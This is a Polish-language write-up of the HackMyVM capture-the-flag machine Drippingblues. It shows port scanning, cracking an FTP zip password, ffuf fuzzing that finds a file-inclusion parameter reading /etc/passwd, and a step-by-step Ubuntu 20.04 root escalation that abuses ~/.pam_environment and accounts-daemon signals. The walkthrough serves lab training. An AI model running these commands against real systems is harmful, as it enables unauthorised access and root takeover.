Drippingblues by Tasiyanci

Write-up is in Polish language.

00. Metainfo

Nazwa: Drippingblues
Autor: Tasiyanci
Wypuszczony: 2021-09-20
Do ściągnięcia: HackMyVM
Poziom: Łatwy
System: Linux
Nauczysz się: Poznasz dużo ślepych zaułków, Ubuntu Gnome

01. Wstęp

Ta wirtualka jest bardzo podstępna, dużo czasu zabierają “niepotrzebne” czynności i ślepe zaułki. Jednak to jedna z jej cech. Dzięki temu można dużo rzeczy sobie przypomnieć i nieźle się sfrustrować. :smiley: Obraz również waży niemało, około 3 GB. Jest to zasługa interfejsu graficznego. Być może to jest GNOME(?) To może nam dać wskazówkę, że niekoniecznie trzeba się włamywać przez konsolę, a może tak?

02. Szukanie otwartych portów

Zaczniemy jednak od konsoli.

msf6 > db_nmap -T4 -A -p- 172.16.1.195
[*] Nmap: Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-20 14:36 CEST
[*] Nmap: Nmap scan report for drippingblues.lan (172.16.1.195)
[*] Nmap: Host is up (0.00041s latency).
[*] Nmap: Not shown: 65532 closed ports
[*] Nmap: PORT  STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp   vsftpd 3.0.3
[*] Nmap: | ftp-anon: Anonymous FTP login allowed (FTP code 230)
[*] Nmap: |_-rwxrwxrwx  1 0    0       471 Sep 19 18:57 respectmydrip.zip [NSE: writeable]
[*] Nmap: | ftp-syst:
[*] Nmap: |  STAT:
[*] Nmap: | FTP server status:
[*] Nmap: |   Connected to ::ffff:172.16.1.10
[*] Nmap: |   Logged in as ftp
[*] Nmap: |   TYPE: ASCII
[*] Nmap: |   No session bandwidth limit
[*] Nmap: |   Session timeout in seconds is 300
[*] Nmap: |   Control connection is plain text
[*] Nmap: |   Data connections will be plain text
[*] Nmap: |   At session startup, client count was 2
[*] Nmap: |   vsFTPd 3.0.3 - secure, fast, stable
[*] Nmap: |_End of status
[*] Nmap: 22/tcp open ssh   OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |  3072 9e:bb:af:6f:7d:a7:9d:65:a1:b1:a1:be:91:cd:04:28 (RSA)
[*] Nmap: |  256 a3:d3:c0:b4:c5:f9:c0:6c:e5:47:64:fe:91:c5:cd:c0 (ECDSA)
[*] Nmap: |_ 256 4c:84:da:5a:ff:04:b9:b5:5c:5a:be:21:b6:0e:45:73 (ED25519)
[*] Nmap: 80/tcp open http  Apache httpd 2.4.41 ((Ubuntu))
[*] Nmap: | http-robots.txt: 2 disallowed entries
[*] Nmap: |_/dripisreal.txt /etc/dripispowerful.html
[*] Nmap: |_http-server-header: Apache/2.4.41 (Ubuntu)
[*] Nmap: |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
[*] Nmap: MAC Address: B6:B6:42:48:B5:89 (Unknown)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 4.X|5.X
[*] Nmap: OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
[*] Nmap: OS details: Linux 4.15 - 5.6
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
[*] Nmap: TRACEROUTE
[*] Nmap: HOP RTT   ADDRESS
[*] Nmap: 1  0.41 ms drippingblues.lan (172.16.1.195)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.31 seconds

Są trzy otwarte porty: 21-FTP, 22-SSH i 80-WWW. Już podczas skanowania Nmapem widać, że na FTP jest dostęp przez Anonymous.

03. Pierwszy fałszywy trop

Na FTP jest plik respectmydrip.zip. Oczywiście ma hasło. Spróbujemy je złamać, ale wcześniej trzeba odzyskać hash. Do tego użyjemy Zip2john i John.

# zip2john respectmydrip.zip > respectmydrip.zip.hash
# john -wordlist=/usr/share/wordlists/rockyou.txt respectmydrip.zip.hash
Press 'q' or Ctrl-C to abort, almost any other key for status
072528035    (respectmydrip.zip/respectmydrip.txt)

Hasło do rozpakowania pliku to 072528035. Odzyskaliśmy dwa pliki, jeden to jest wskazówka:

respectmydrip.txt

just focus on "drip"

A drugi to secret.zip. Niestety nie udało się złamać do niego hasła. W sumie wyszło, że to pierwsza podpucha.

04. Drugi fałszywy trop

Zobaczmy co się dzieję na naszej WWW. Zaczynamy na szybko standardowe skanowanko:

# dirb http://172.16.1.195
-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct 4 17:49:41 2021
URL_BASE: http://172.16.1.195/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.16.1.195/ ----
+ http://172.16.1.195/index.php (CODE:200|SIZE:138)
+ http://172.16.1.195/robots.txt (CODE:200|SIZE:78)
+ http://172.16.1.195/server-status (CODE:403|SIZE:277)

-----------------
END_TIME: Mon Oct 4 17:49:43 2021
DOWNLOADED: 4612 - FOUND: 3

Poniżej zawartość pliku robots.txt:

http://172.16.1.195/robots.txt

User-agent: * Disallow: /dripisreal.txt Disallow: /etc/dripispowerful.html

Zobaczmy co się kryję pod dripisreal.txt:

http://172.16.1.195/dripisreal.txt

hello dear hacker wannabe, go for this lyrics: https://www.azlyrics.com/lyrics/youngthug/constantlyhating.html count the n words and put them side by side then md5sum it ie, hellohellohellohello >> md5sum hellohellohellohello it's the password of ssh

Jest tam odwołanie do strony. Ze strony należy ściągnąć tekst piosenki, policzyć(?) i ułożyć wyrazy obok siebie. Wchodząc tam widzimy tekst piosenki, ale nie wiadomo, które słowa brać pod uwagę itd. Po konsultacjach okazało się, że to jest kolejna podpucha. To już druga. Nie marnujmy na to czasu.

05. Login i hasło

Plik index.php zawiera taką wiadomość:

http://172.16.1.195/index.php

driftingblues is hacked again so it's now called drippingblues. :D hahaha by travisscott & thugger

Jednak co należy zauważyć, to że index.php jest to plik w formacie PHP. Nieśmiało można założyć, że będzie można coś z tym zrobić. Należy znaleźć parametr. Można go albo zgadnąć, albo sprawdzić wszystkie opcje. Tym razem na tapetę weźmiemy większy słownik rockyou.txt.

# ffuf -w /usr/share/wordlists/rockyou.txt -u http://172.16.1.195/index.php?FUZZ=/etc/passwd -fs 138 
    /'___\ /'___\      /'___\
    /\ \__/ /\ \__/ __ __ /\ \__/
    \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
    \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
     \ \_\  \ \_\ \ \____/ \ \_\
     \/_/  \/_/  \/___/  \/_/

    v1.3.1 Kali Exclusive <3
________________________________________________

 :: Method      : GET
 :: URL       : http://172.16.1.195/index.php?FUZZ=/etc/passwd
 :: Wordlist     : FUZZ: /usr/share/wordlists/rockyou.txt
 :: Follow redirects : false
 :: Calibration   : false
 :: Timeout     : 10
 :: Threads     : 40
 :: Matcher     : Response status: 200,204,301,302,307,401,403,405
 :: Filter      : Response size: 138
________________________________________________

drip          [Status: 200, Size: 3032, Words: 50, Lines: 58]
:: Progress: [14344392/14344392] :: Job [1/1] :: 3463 req/sec :: Duration: [1:39:30] :: Errors: 861 ::

Po dłuższym czasie mamy parametr. W sumie można było go zgadnąć, prawda? :smiley: Sprawdźmy takie coś:

view-source:http://172.16.1.195/index.php?drip=/etc/dripispowerful.html obraz

Jest hasło do Shella. Jeżeli przejdziemy do wirtualki, zobaczymy login.

06. Ostatnia podpucha

Jesteśmy na konsoli, jest tam dużo otwartych portów, ale nauczywszy się, że tutaj prawie wszędzie są ślepe zaułki i wirtualka jest na GNOME, to może coś będzie łatwego? Sprawdziwszy system, widzimy że jest na Ubuntu 20.04, więc można zastosować pewną sztuczkę. Chcę jednak przestrzec, że może się nie udać od razu. Możesz zablokować sobie konsolę przez maksymalne obciążenie procesora. Skasowanie pliku ~/.pam_environment i restart serwera pomaga. Poniżej opiszę komendy jakie należy wykonać.

# ln -s /dev/zero ~/.pam_environment

Zmieniamy język na inny: Settings->Region and language -> Other language

# NrFromPidof=$(pidof accounts-daemon)
# kill -SIGSTOP $NrFromPidof
# rm ~/.pam_environment
# nohup bash -c "sleep 30s; kill -SIGSEGV $NrFromPidof; kill -SIGCONT $NrFromPidof" &

Po wydaniu ostatniej komendy mamy 30 sekund na wylogowanie się. Robimy to, następnie czekamy, aż system nas zaloguje, abyśby mogli stworzyć nowe konto. Mamy dostęp do roota przez komendę su. Żeby to wszystko lepiej zrozumieć, poniżej zamieszczam filmik z YouTube.

07. Na dziś to już wszystko

Jeżeli podobał się wpis, napisz mejla na kerszi@protonmail.com.

Zostaw komentarz